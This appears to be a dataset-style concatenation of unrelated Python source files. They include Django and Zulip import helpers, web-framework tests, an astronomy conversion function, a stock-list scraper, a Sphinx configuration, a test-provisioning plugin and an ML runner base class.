('creator', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
('moderators', models.ManyToManyField(related_name='moderators', to=settings.AUTH_USER_MODEL)),
],
),
]
|
py | 1a3f705834734bbeba02d8de4ef4a9b26a8043e2 | from rest_framework import permissions
class IsOwnwerOrReadOnly(permissions.BasePermission):
'''
Custom permission to only allow owners of an object
to edit it
'''
def has_object_permission(self, request, view, obj):
#read permissions are allowed to any request
#just allo GET,HEAD ir OPTION requests
if request.method in permissions.SAFE_METHODS:
return True
return obj.owner == request.user |
py | 1a3f716a35069b903cc5b88da4aec9582ada9035 | import random
import requests
import shutil
import logging
import os
from typing import List, Dict, Any, Optional
from django.forms.models import model_to_dict
from zerver.models import Realm, RealmEmoji, Subscription, Recipient, \
Attachment, Stream, Message
from zerver.lib.actions import STREAM_ASSIGNMENT_COLORS as stream_colors
from zerver.lib.avatar_hash import user_avatar_path_from_ids
from zerver.lib.parallel import run_parallel
# stubs
ZerverFieldsT = Dict[str, Any]
def build_zerver_realm(realm_id: int, realm_subdomain: str, time: float,
other_product: str) -> List[ZerverFieldsT]:
realm = Realm(id=realm_id, date_created=time,
name=realm_subdomain, string_id=realm_subdomain,
description=("Organization imported from %s!" % (other_product)))
auth_methods = [[flag[0], flag[1]] for flag in realm.authentication_methods]
realm_dict = model_to_dict(realm, exclude='authentication_methods')
realm_dict['authentication_methods'] = auth_methods
return[realm_dict]
def build_avatar(zulip_user_id: int, realm_id: int, email: str, avatar_url: str,
timestamp: Any, avatar_list: List[ZerverFieldsT]) -> None:
avatar = dict(
path=avatar_url, # Save original avatar url here, which is downloaded later
realm_id=realm_id,
content_type=None,
user_profile_id=zulip_user_id,
last_modified=timestamp,
user_profile_email=email,
s3_path="",
size="")
avatar_list.append(avatar)
def build_subscription(recipient_id: int, user_id: int,
subscription_id: int) -> ZerverFieldsT:
subscription = Subscription(
color=random.choice(stream_colors),
id=subscription_id)
subscription_dict = model_to_dict(subscription, exclude=['user_profile', 'recipient_id'])
subscription_dict['user_profile'] = user_id
subscription_dict['recipient'] = recipient_id
return subscription_dict
def build_recipient(type_id: int, recipient_id: int, type: int) -> ZerverFieldsT:
recipient = Recipient(
type_id=type_id, # stream id
id=recipient_id,
type=type)
recipient_dict = model_to_dict(recipient)
return recipient_dict
def build_realm(zerver_realm: List[ZerverFieldsT], realm_id: int,
domain_name: str) -> ZerverFieldsT:
realm = dict(zerver_client=[{"name": "populate_db", "id": 1},
{"name": "website", "id": 2},
{"name": "API", "id": 3}],
zerver_customprofilefield=[],
zerver_customprofilefieldvalue=[],
zerver_userpresence=[], # shows last logged in data, which is not available
zerver_userprofile_mirrordummy=[],
zerver_realmdomain=[{"realm": realm_id,
"allow_subdomains": False,
"domain": domain_name,
"id": realm_id}],
zerver_useractivity=[],
zerver_realm=zerver_realm,
zerver_huddle=[],
zerver_userprofile_crossrealm=[],
zerver_useractivityinterval=[],
zerver_reaction=[],
zerver_realmemoji=[],
zerver_realmfilter=[])
return realm
def build_usermessages(zerver_usermessage: List[ZerverFieldsT], usermessage_id: int,
zerver_subscription: List[ZerverFieldsT], recipient_id: int,
mentioned_users_id: List[int], message_id: int) -> int:
for subscription in zerver_subscription:
if subscription['recipient'] == recipient_id:
flags_mask = 1 # For read
if subscription['user_profile'] in mentioned_users_id:
flags_mask = 9 # For read and mentioned
usermessage = dict(
user_profile=subscription['user_profile'],
id=usermessage_id,
flags_mask=flags_mask,
message=message_id)
usermessage_id += 1
zerver_usermessage.append(usermessage)
return usermessage_id
def build_defaultstream(realm_id: int, stream_id: int,
defaultstream_id: int) -> ZerverFieldsT:
defaultstream = dict(
stream=stream_id,
realm=realm_id,
id=defaultstream_id)
return defaultstream
def build_stream(date_created: Any, realm_id: int, name: str,
description: str, stream_id: int, deactivated: bool=False,
invite_only: bool=False) -> ZerverFieldsT:
stream = Stream(
name=name,
deactivated=deactivated,
description=description,
date_created=date_created,
invite_only=invite_only,
id=stream_id)
stream_dict = model_to_dict(stream,
exclude=['realm'])
stream_dict['realm'] = realm_id
return stream_dict
def build_message(subject: str, pub_date: float, message_id: int, content: str,
rendered_content: Optional[str], user_id: int, recipient_id: int,
has_image: bool=False, has_link: bool=False,
has_attachment: bool=True) -> ZerverFieldsT:
zulip_message = Message(
rendered_content_version=1, # this is Zulip specific
subject=subject,
pub_date=pub_date,
id=message_id,
content=content,
rendered_content=rendered_content,
has_image=has_image,
has_attachment=has_attachment,
has_link=has_link)
zulip_message_dict = model_to_dict(zulip_message,
exclude=['recipient', 'sender', 'sending_client'])
zulip_message_dict['sender'] = user_id
zulip_message_dict['sending_client'] = 1
zulip_message_dict['recipient'] = recipient_id
return zulip_message_dict
def build_attachment(realm_id: int, message_id: int, attachment_id: int,
user_id: int, fileinfo: ZerverFieldsT, s3_path: str,
zerver_attachment: List[ZerverFieldsT]) -> None:
"""
This function should be passed a 'fileinfo' dictionary, which contains
information about 'size', 'created' (created time) and ['name'] (filename).
"""
attachment = Attachment(
id=attachment_id,
size=fileinfo['size'],
create_time=fileinfo['created'],
is_realm_public=True,
path_id=s3_path,
file_name=fileinfo['name'])
attachment_dict = model_to_dict(attachment,
exclude=['owner', 'messages', 'realm'])
attachment_dict['owner'] = user_id
attachment_dict['messages'] = [message_id]
attachment_dict['realm'] = realm_id
zerver_attachment.append(attachment_dict)
def process_avatars(avatar_list: List[ZerverFieldsT], avatar_dir: str, realm_id: int,
threads: int, size_url_suffix: str='') -> List[ZerverFieldsT]:
"""
This function gets the avatar of the user and saves it in the
user's avatar directory with both the extensions '.png' and '.original'
Required parameters:
1. avatar_list: List of avatars to be mapped in avatars records.json file
2. avatar_dir: Folder where the downloaded avatars are saved
3. realm_id: Realm ID.
"""
def get_avatar(avatar_upload_list: List[str]) -> int:
avatar_url = avatar_upload_list[0]
image_path = avatar_upload_list[1]
original_image_path = avatar_upload_list[2]
response = requests.get(avatar_url + size_url_suffix, stream=True)
with open(image_path, 'wb') as image_file:
shutil.copyfileobj(response.raw, image_file)
shutil.copy(image_path, original_image_path)
return 0
logging.info('######### GETTING AVATARS #########\n')
logging.info('DOWNLOADING AVATARS .......\n')
avatar_original_list = []
avatar_upload_list = []
for avatar in avatar_list:
avatar_hash = user_avatar_path_from_ids(avatar['user_profile_id'], realm_id)
avatar_url = avatar['path']
avatar_original = dict(avatar)
image_path = ('%s/%s.png' % (avatar_dir, avatar_hash))
original_image_path = ('%s/%s.original' % (avatar_dir, avatar_hash))
avatar_upload_list.append([avatar_url, image_path, original_image_path])
# We don't add the size field here in avatar's records.json,
# since the metadata is not needed on the import end, and we
# don't have it until we've downloaded the files anyway.
avatar['path'] = image_path
avatar['s3_path'] = image_path
avatar_original['path'] = original_image_path
avatar_original['s3_path'] = original_image_path
avatar_original_list.append(avatar_original)
# Run downloads parallely
output = []
for (status, job) in run_parallel(get_avatar, avatar_upload_list, threads=threads):
output.append(job)
logging.info('######### GETTING AVATARS FINISHED #########\n')
return avatar_list + avatar_original_list
def process_uploads(upload_list: List[ZerverFieldsT], upload_dir: str,
threads: int) -> List[ZerverFieldsT]:
"""
This function downloads the uploads and saves it in the realm's upload directory.
Required parameters:
1. upload_list: List of uploads to be mapped in uploads records.json file
2. upload_dir: Folder where the downloaded uploads are saved
"""
def get_uploads(upload: List[str]) -> int:
upload_url = upload[0]
upload_path = upload[1]
upload_path = os.path.join(upload_dir, upload_path)
response = requests.get(upload_url, stream=True)
os.makedirs(os.path.dirname(upload_path), exist_ok=True)
with open(upload_path, 'wb') as upload_file:
shutil.copyfileobj(response.raw, upload_file)
return 0
logging.info('######### GETTING ATTACHMENTS #########\n')
logging.info('DOWNLOADING ATTACHMENTS .......\n')
upload_url_list = []
for upload in upload_list:
upload_url = upload['path']
upload_s3_path = upload['s3_path']
upload_url_list.append([upload_url, upload_s3_path])
upload['path'] = upload_s3_path
# Run downloads parallely
output = []
for (status, job) in run_parallel(get_uploads, upload_url_list, threads=threads):
output.append(job)
logging.info('######### GETTING ATTACHMENTS FINISHED #########\n')
return upload_list
def process_emojis(zerver_realmemoji: List[ZerverFieldsT], emoji_dir: str,
emoji_url_map: ZerverFieldsT, threads: int) -> List[ZerverFieldsT]:
"""
This function downloads the custom emojis and saves in the output emoji folder.
Required parameters:
1. zerver_realmemoji: List of all RealmEmoji objects to be imported
2. emoji_dir: Folder where the downloaded emojis are saved
3. emoji_url_map: Maps emoji name to its url
"""
def get_emojis(upload: List[str]) -> int:
emoji_url = upload[0]
emoji_path = upload[1]
upload_emoji_path = os.path.join(emoji_dir, emoji_path)
response = requests.get(emoji_url, stream=True)
os.makedirs(os.path.dirname(upload_emoji_path), exist_ok=True)
with open(upload_emoji_path, 'wb') as emoji_file:
shutil.copyfileobj(response.raw, emoji_file)
return 0
emoji_records = []
upload_emoji_list = []
logging.info('######### GETTING EMOJIS #########\n')
logging.info('DOWNLOADING EMOJIS .......\n')
for emoji in zerver_realmemoji:
emoji_url = emoji_url_map[emoji['name']]
emoji_path = RealmEmoji.PATH_ID_TEMPLATE.format(
realm_id=emoji['realm'],
emoji_file_name=emoji['name'])
upload_emoji_list.append([emoji_url, emoji_path])
emoji_record = dict(emoji)
emoji_record['path'] = emoji_path
emoji_record['s3_path'] = emoji_path
emoji_record['realm_id'] = emoji_record['realm']
emoji_record.pop('realm')
emoji_records.append(emoji_record)
# Run downloads parallely
output = []
for (status, job) in run_parallel(get_emojis, upload_emoji_list, threads=threads):
output.append(job)
logging.info('######### GETTING EMOJIS FINISHED #########\n')
return emoji_records
|
py | 1a3f71dee3f107f5af11f61afab45c122d7599ad | from ferrisnose import AppEngineWebTest
import wtforms
import json
from ferris.core.controller import Controller, route, route_with
from ferris.core.json_util import DatastoreEncoder
from google.appengine.ext import ndb
# Decorators that make sure @route works correctly even for decorated functions
def std_decorator(f):
def std_wrapper(*args, **kwargs):
return f(*args, **kwargs)
return std_wrapper
def wraps_decorator(f):
from functools import wraps
@wraps(f)
def wraps_wrapper(*args, **kwargs):
return f(*args, **kwargs)
return wraps_wrapper
class TestModel(ndb.Model):
field1 = ndb.StringProperty()
field2 = ndb.StringProperty()
class TestForm(wtforms.Form):
field1 = wtforms.TextField()
field2 = wtforms.TextField()
class TestComponent(object):
def __init__(self, handler):
self.handler = handler
def present(self):
return 'si'
class TestController(Controller):
class Meta:
prefixes = ('monster',)
components = (TestComponent,)
def list(self):
return 'list'
def view(self, key):
return 'view'
def add(self):
return 'add'
def edit(self, key):
return 'edit'
def delete(self, key):
return 204
def monster_list(self):
return 'monster_list'
@route
@wraps_decorator
def monkey(self, key):
return 'monkey-%s' % key
@route
@std_decorator
def monster_monkey(self, key):
return 'monster_monkey-%s' % key
@route_with('/test_controller/monet')
def degas(self):
return 'degas'
@route
def urls(self):
assert self.uri(action='list') == '/test_controller'
assert self.uri(prefix='monster', action='list') == '/monster/test_controller'
assert self.uri(action='edit', key=12) == '/test_controller/%3A12/edit'
assert self.uri('test_controller:list') == '/test_controller'
assert self.uri('monster:test_controller:list') == '/monster/test_controller'
assert self.uri('test_controller:monkey', key=13) == '/test_controller/monkey/13'
return 'success'
@route
def component(self):
return self.components.test_component.present()
@route
def numeric(self):
return 401
@route
def custom_content(self):
self.response.content_type = 'application/json'
return '[1, 2, 3]'
@route
def self_response(self):
self.response.status_int = 401
self.response.body = 'lolidk'
return self.response
@route
def do_redirect(self):
return self.redirect(self.uri('test_controller:list'))
@route
def monster_template_names(self):
return str(self.meta.view.get_template_names())
@route
def form(self):
form = TestForm()
self.parse_request(container=form)
return str(form.data)
class ControllerTest(AppEngineWebTest):
def setUp(self):
super(ControllerTest, self).setUp()
TestController._build_routes(self.testapp.app.router)
def testCrudRoutes(self):
response = self.testapp.get('/test_controller')
self.assertEqual(response.body, 'list')
response = self.testapp.get('/test_controller/add')
self.assertEqual(response.body, 'add')
response = self.testapp.get('/test_controller/:abcd')
self.assertEqual(response.body, 'view')
response = self.testapp.get('/test_controller/:abcd/edit')
self.assertEqual(response.body, 'edit')
response = self.testapp.get('/test_controller/:abcd/delete', status=204)
def testRestRoutes(self):
response = self.testapp.get('/test_controller')
self.assertEqual(response.body, 'list')
response = self.testapp.post('/test_controller')
self.assertEqual(response.body, 'add')
response = self.testapp.get('/test_controller/:abcd')
self.assertEqual(response.body, 'view')
response = self.testapp.put('/test_controller/:abcd')
self.assertEqual(response.body, 'edit')
response = self.testapp.delete('/test_controller/:abcd', status=204)
def testPrefixRoutes(self):
response = self.testapp.get('/monster/test_controller')
self.assertEqual(response.body, 'monster_list')
def testRouteDecorator(self):
response = self.testapp.get('/test_controller/monkey/3')
self.assertEqual(response.body, 'monkey-3')
response = self.testapp.get('/monster/test_controller/monkey/3')
self.assertEqual(response.body, 'monster_monkey-3')
def testRouteWithDecorator(self):
response = self.testapp.get('/test_controller/monet')
self.assertEqual(response.body, 'degas')
def testUrlGeneration(self):
response = self.testapp.get('/test_controller/urls')
self.assertEqual(response.body, 'success')
def testComponents(self):
response = self.testapp.get('/test_controller/component')
self.assertEqual(response.body, 'si')
def testReturnValues(self):
response = self.testapp.get('/test_controller')
assert 'text/html' in response.headers['Content-Type']
self.assertEqual(response.body, 'list')
response = self.testapp.get('/test_controller/numeric', status=401)
response = self.testapp.get('/test_controller/custom_content', status=200)
assert 'application/json' in response.headers['Content-Type']
response = self.testapp.get('/test_controller/self_response', status=401)
self.assertEqual(response.body, 'lolidk')
response = self.testapp.get('/test_controller/do_redirect', status=302)
self.assertEqual(response.headers['Location'], 'http://localhost/test_controller')
def testTemplateNames(self):
response = self.testapp.get('/monster/test_controller/template_names')
self.assertEqual(response.body, str(['test_controller/monster_template_names.html', 'test_controller/template_names.html']))
def testFormDataProcessor(self):
data = {'field2': u'f2', 'field1': u'f1'}
response = self.testapp.post('/test_controller/form', data)
self.assertEqual(response.body, str(data))
data['field3'] = u'f3'
response = self.testapp.post('/test_controller/form', data)
self.assertNotEqual(response.body, str(data), 'Field3 should not be in data')
del data['field3']
data = json.dumps(data, cls=DatastoreEncoder)
response = self.testapp.post('/test_controller/form', data, headers={'Content-Type': 'application/json'})
self.assertTrue('f1' in response)
self.assertTrue('f2' in response)
|
py | 1a3f7252754bcf10e1d747ff1edb266a809f91cd | from app import db
class Usuario(db.Model):
__tablename__ = 'usuarios'
id = db.Column(db.Integer, primary_key=True)
nome = db.Column(db.String(200))
email = db.Column(db.String(200), index=True, unique=True)
senha = db.Column(db.String(200))
admin = db.Column(db.Boolean())
def __repr__(self):
return '<Usuario %s>' % self.nome |
py | 1a3f727725aff897105563f3ce3e50406f30f334 | '''
Created on Jul 25, 2017
@author: Daniel Sela, Arnon Sela
'''
def sixty(scalar, trailsign=False, ):
'''
;+
; NAME:
; SIXTY()
; PURPOSE:
; Converts a decimal number to sexagesimal.
; EXPLANATION:
; Reverse of the TEN() function.
;
; CALLING SEQUENCE:
; X = SIXTY( SCALAR, [ /TrailSign ] )
;
; INPUTS:
; SCALAR -- Decimal quantity.
; OUTPUTS:
; Function value returned = real vector of three elements,
; sexagesimal equivalent of input decimal quantity. Double
; precision if the input is double, otherwise floating point.
; By default, a negative number is signified by making the first non-zero
; element of the output vection negative, but this can be modified with
; the /TrailSign keyword.
;
; OPTIONAL INPUT KEYWORD:
; /TrailSign - By default, SIXTY() returns a negative sign in the first
; nonzero element. If /TrailSign is set, then SIXTY() will return
; always return a negative sign in the first element, even if it is
; zero
; PROCEDURE:
; Mostly involves checking arguments and setting the sign.
;
; EXAMPLE:
; If x = -0.345d then sixty(x) = [0.0, -20.0, 42.0]
; and sixty(x,True) = [-0.0, 20.0, 42.0]
;-
Changes History:
Added dd range limit - force positive value by complementing to dd_range
prevent adding negative sign to value of 0
'''
if not isinstance(scalar, float):
scalar = float(scalar)
ss = abs(3600.0*scalar)
mm = abs(60.0*scalar)
dd = abs(scalar)
result = [0, 0, 0]
result[0] = int(dd)
result[1] = int(mm-60.0*result[0])
result[2] = ss-3600.0*result[0] - 60.0*result[1]
if scalar < 0:
if trailsign:
result[0] = -result[0]
else:
if result[0] != 0:
result[0] = -result[0]
elif result[1] != 0:
result[1] = -result[1]
elif result[2] != 0:
result[2] = -result[2]
return result
if __name__ == '__main__':
import unittest
from astropy.coordinates import Angle
from astropy import units as u
class TestSixtyMethod(unittest.TestCase):
def test_1(self):
self.assertEqual(sixty(-0.5), [0, -30, 0.0])
def test_2(self):
self.assertEqual(sixty(0.5), [0, 30, 0.0])
def test_3(self):
self.assertEqual(sixty(10.49999), [10, 29, 59.96399999999994])
def test_4(self):
dms = Angle(-0.5, unit=u.deg).dms
result = list(dms._asdict().values())
self.assertEqual(result, [-0.0, -30.0, -0.0])
unittest.main()
|
py | 1a3f72ffac96d80d595a41209fe77b7fa0b1773f | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Feb 18 22:18:27 2021
@author: galin
"""
import string
import requests
from bs4 import BeautifulSoup
import pandas as pd
import time
from tqdm.auto import tqdm
# stock exchange :
# AMEX - American Stock Exchange,
# LSE - London Stock Exchange,
# NASDAQ - NASDAQ Stock Exchange,
# NYSE - New York Stock Exchange,
# SGX - Singapore Stock Exchange
# TSX - Toronto Stock Exchange
def get_indexes (stocks_exchange):
def get_stock_indexes(stock_exchange_name):
base_url="http://eoddata.com/stocklist"
letters_upper_case = list(string.ascii_uppercase)
digits = [x for x in range(10)]
if stock_exchange_name in ['LSE', 'SGX']:
symbols_tabs = digits + letters_upper_case
else:
symbols_tabs = letters_upper_case
df_index_description = pd.DataFrame({'Code':[],
'Name':[]})
urls = [base_url + "/{}/{}.htm".format(stock_exchange_name, letter)
for letter in symbols_tabs ]
html_contents = (requests.get(url).text for url in urls)
with tqdm(total=len(urls)) as pbar:
for html_content in html_contents:
soup = BeautifulSoup(html_content, "lxml")
tables = soup.find_all(lambda tag: tag.name=='table')
read_table = pd.read_html(str(tables[5]))
temp = read_table[0][['Code','Name']]
if(set(temp['Code']).isdisjoint(set(df_index_description['Code']))):
df_index_description = pd.concat([df_index_description
, read_table[0][['Code','Name']]
])
time.sleep(1)
pbar.update(1)
return df_index_description['Code']
df_index_description = pd.DataFrame()
for stocks in stocks_exchange:
df_index_description = pd.concat([df_index_description
, get_stock_indexes(stocks)])
return df_index_description[0].tolist()
|
py | 1a3f736624d7ebca97f6573d68fed32100008f64 | import pyaf.tests.model_control.test_ozone_custom_models_enabled as testmod
testmod.build_model( ['Fisher'] , ['MovingAverage'] , ['Seasonal_DayOfWeek'] , ['SVR'] ); |
py | 1a3f73ccde0dc1ea07cca2d9729597904b2f5b41 | # -*- coding: utf-8 -*-
#
# bebop_autonomy documentation build configuration file, created by
# sphinx-quickstart on Mon Sep 7 15:33:01 2015.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = []
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'bebop_autonomy'
copyright = u'2015, Mani Monajjemi (AutonomyLab, Simon Fraser University)'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = 'indigo-devel'
# The full version, including alpha/beta/rc tags.
release = 'indigo-devel'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
#html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'bebop_autonomydoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
('index', 'bebop_autonomy.tex', u'bebop\\_autonomy Documentation',
u'Mani Monajjemi', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'bebop_autonomy', u'bebop_autonomy Documentation',
[u'Mani Monajjemi'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'bebop_autonomy', u'bebop_autonomy Documentation',
u'Mani Monajjemi', 'bebop_autonomy', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
on_rtd = os.environ.get('READTHEDOCS', None) == 'True'
if not on_rtd: # only import and set the theme if we're building docs locally
import sphinx_rtd_theme
html_theme = 'sphinx_rtd_theme'
html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
|
py | 1a3f73d1173dc771e60d7801ed221a19b8167443 | import pytest
from pymtl import *
from tests.context import lizard
from lizard.model.test_model import run_test_state_machine
from lizard.util.rtl.lookup_registerfile import LookupRegisterFile, LookupRegisterFileInterface
from lizard.util.fl.lookup_registerfile import LookupRegisterFileFL
def test_state_machine():
run_test_state_machine(
LookupRegisterFile,
LookupRegisterFileFL, (LookupRegisterFileInterface(
Bits(8), Bits(8), 2, 2), [(2, 4), 3], [0, 0]),
translate_model=True)
|
py | 1a3f742397de3882a0c15860a35058cff24d52f7 | import six
from rest_framework import status
def sanitized(schema_key):
if type(schema_key) is tuple:
return schema_key[0]
return schema_key
def key_params(schema_key):
if type(schema_key) is tuple:
return schema_key[1:]
return []
def get_required(schema_keys):
for key in schema_keys:
params = key_params(key)
if 'norequired' in params:
continue
yield sanitized(key)
def get_object_properties(schema):
return {
sanitized(skey): val
for skey, val in schema.items()
}
def parse_schema(schema):
if type(schema) is six.binary_type or type(schema) is six.text_type:
return {
'type': schema,
}
elif type(schema) is list:
return {
'type': 'list',
}
elif type(schema) is dict:
title = schema.get(':title', None)
required_elts = list(get_required(schema.keys()))
properties = get_object_properties(schema)
return {
'type': 'object',
'title': title,
'properties': {
prop_name: parse_schema(subschema)
for prop_name, subschema in properties.items()
},
'required': required_elts,
}
else:
raise Exception('Unsupported schema definition')
def responds(status=status.HTTP_200_OK,
meaning='Undocumented status code',
schema=None,
schema_name=None,
**kwargs):
"""Documents the status code per handled case.
Additional parameters may make it into the OpenAPI documentation
per view. Examples of those parameters include
examples={'application/json': <example>}. As schemata are needed
in order to render the examples in the Web UI, an error will be
signaled if examples= are provided without a schema= parameter.
Schemas can be easily built using a specific syntax.
TODO: Document the syntax here
"""
# TODO: Document syntax in above docstring
if status is None:
status = 'default'
obj = {}
obj['description'] = meaning
if schema:
obj['schema'] = parse_schema(schema)
if schema_name:
obj['schema_name'] = schema_name
obj.update(kwargs)
def decorator(func):
# We do not return a decorator function, we just modify
# in-place our function to have the property that we will look
# forward later for.
if not hasattr(func, '_responses'):
func._responses = {}
func._responses[status] = obj
return func
return decorator
|
py | 1a3f74816979c8eef428462a6458bc569049529e | import os
from click import echo
from tmt.steps.provision.base import ProvisionBase
from tmt.utils import SpecificationError
class ProvisionLocalhost(ProvisionBase):
""" Localhost provisioner """
def __init__(self, data, step):
super(ProvisionLocalhost, self).__init__(data, step)
self._prepare_map = {
'ansible': self._prepare_ansible,
'shell': self._prepare_shell,
}
def execute(self, *args, **kwargs):
self.run(self.join(args))
def _prepare_ansible(self, what):
""" Run ansible on localhost """
# Playbook paths should be relative to the metadata tree root
playbook = os.path.join(self.step.plan.run.tree.root, what)
# Prepare verbose level based on the --debug option count
verbose = ' -' + self.opt('debug') * 'v' if self.opt('debug') else ''
# Run ansible playbook against localhost, in verbose mode
ansible = (
f'ansible-playbook{verbose} -c local -i localhost, {playbook}')
# Force column width to 80 chars, to mitigate issues with too long
# lines due to indent. Column width is the same as with libvirt plugin.
columns = 'stty cols 80'
self.run(f'sudo sh -c "{columns}; {ansible}"')
def _prepare_shell(self, what):
""" Run ansible on localhost """
# Set current working directory to the test metadata root
self.run(what, cwd=self.step.plan.run.tree.root)
def prepare(self, how, what):
""" Run prepare phase """
try:
self._prepare_map[how](what)
except AttributeError as e:
raise SpecificationError(
f"Prepare method '{how}' is not supported.")
|
py | 1a3f74fb29fbd48afdf202d2457761bfaaece431 | from typing import ( # isort:skip
Any, Callable, Dict, Mapping, Optional, Tuple, Union # isort:skip
) # isort:skip
from abc import ABC, abstractmethod
from collections import OrderedDict
import torch
from torch import nn
from torch.utils.data import DataLoader, DistributedSampler
from catalyst import utils
from catalyst.utils.tools.typing import (
Criterion, Device, Model, Optimizer, Scheduler
)
from .callback import Callback, LoggerCallback
from .experiment import _Experiment
from .state import _State
class _Runner(ABC):
"""
Abstract class for all runners inherited from
"""
experiment_fn: Callable = _Experiment
state_fn: callable = _State
def __init__(
self,
model: Model = None,
device: Device = None,
):
"""
Args:
model (Model): Torch model object
device (Device): Torch device
"""
# main
self._model: Model = model
self._device: Device = device
self.experiment: _Experiment = None
self.state: _State = None
self.callbacks: OrderedDict[str, Callback] = None
self.loggers: OrderedDict[str, LoggerCallback] = None
self.loaders: OrderedDict[str, DataLoader] = None
# additional
self._check_run = False
@property
def model(self) -> Model:
"""
Returns the runner's model instance
"""
return self._model
@model.setter
def model(self, value: Union[Model, Dict[str, Model]]):
"""
Setter for the runner's model'
"""
if isinstance(value, nn.Module):
model = value
elif isinstance(value, dict):
values_are_models = all(
[isinstance(v, nn.Module) for v in value.values()]
)
if not values_are_models:
raise TypeError(
"Invalid dict value type, must be `torch.nn.Module`"
)
model = value
else:
raise TypeError(
f"Invalid value type "
f"must be `torch.nn.Module` or `Dict[str, torch.nn.Module]` "
f"got '{type(value)}'"
)
if self._device is not None:
model: Model = utils.maybe_recursive_call(
model, "to", device=self._device
)
self._model = model
@property
def device(self) -> Device:
"""
Returns the runner's device instance
"""
return self._device
@device.setter
def device(self, value: Device):
"""
